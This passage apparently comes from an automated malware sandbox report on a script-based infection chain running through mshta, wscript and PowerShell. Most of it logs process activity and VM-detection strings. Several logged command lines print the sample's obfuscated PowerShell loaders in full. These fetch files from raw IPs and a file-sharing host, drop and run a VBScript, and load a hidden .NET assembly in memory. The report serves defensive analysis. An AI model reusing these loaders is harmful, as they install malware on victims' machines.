          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3631
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6130
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6770
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2867
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1313
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 693
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5698
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4095
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348 | Thread sleep time: -19369081277395017s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856 | Thread sleep count: 6770 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 | Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856 | Thread sleep count: 2867 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080 | Thread sleep count: 1313 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080 | Thread sleep count: 693 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3168 | Thread sleep count: 91 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3912 | Thread sleep count: 5698 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128 | Thread sleep count: 4095 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504 | Thread sleep time: -17524406870024063s >= -30000s
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\sppc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dll
          Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\dxcore.dll
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: wscript.exe, 00000006.00000003.1776952208.00000000057B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: mshta.exe, 00000000.00000002.1688117112.0000000005102000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3H
          Source: wscript.exe, 00000006.00000003.1776952208.00000000057B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.000000000731C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000009.00000002.1841164664.0000000007BDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi32_6248.amsi.csv, type: OTHER
          Source: Yara match | File source: amsi32_2492.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jej5byagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevbficagicagicagicagicagicagicagicagicagicagicagic1nru1crvjezuzptklusu9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicageu56eg4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihrzdvksdwludcagicagicagicagicagicagicagicagicagicagicagicbralvxbhdkyunavyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagd0epoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagimnubiigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzuefdzsagicagicagicagicagicagicagicagicagicagicagicb5cwfmv2ztccagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrcew86olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4xmjgumje1lziyni9zzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudelgiiwijevodjpbufbeqvrbxhnlzxrozxbvc3npymxldghpbmdzzm9yzw50axjldgltzxrvz2l2zw1lymvzdc52qnmildasmck7c3rbclqtc0xlzxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudkjzig=='+[char]34+'))')))"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('hgaimageurl = dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shtp'+'hbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c dfw;hgawebclient '+'= new-object system.net.webclient;hga'+'imagebytes = hgawebclient.d'+'ownload'+'data(hgaimageurl);hgai'+'magetext = [system.text.encoding]::utf8.getstring(hgaimagebytes);hgastartflag = dfw<<base64_start>>dfw;hgaendflag = df'+'w<<base64_end>>dfw;hgastartindex = hgaimagetext'+'.indexof(hgastartflag);hgaendindex = hgaimagetext.indexof'+'(hgaendflag);hgastartindex -ge 0 -and hgaendindex -gt hgas'+'tartindex;hgastartindex += hgastartf'+'lag.length;hgabase64length = hgaendindex - hgastar'+'tindex;hgabase64command = hgaimagetext.substring(hgasta'+'rtindex, hgabase64length);hgabase64reversed = -join (hgabase64command.tochararray() n9y foreach-object { hga_ })[-1..-(hgabase64command.length)];hgacommandbytes = [system.convert]::f'+'rombase64string(hgab'+'a'+'se64reversed);hgaloadedassembly = [system.reflection.assembly]::load(hgacommandbytes);hgavaim'+'ethod = [dnlib.io'+'.home].getmethod('+'dfwvaidfw);hgavaimethod.invoke(hganull, @(dfwtxt.rtcccrv/622/512.821.59.32//:ptthdfw, dfwdesativadodfw, dfwdesativadodfw, dfwdesativadodfw, dfwaspnet_compilerdfw, dfwdesativadodfw, dfwdesativ'+'ado'+'dfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesa'+'tivadodfw,dfwdesativadodfw,dfw1dfw,dfwd'+'esativadodfw));') -creplace([char]68+[char]102+[char]119),[char]39-creplace 'n9y',[char]124-replace ([char]104+[char]71+[char]97),[char]36)| .( $env:comspec[4,24,25]-join'')"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
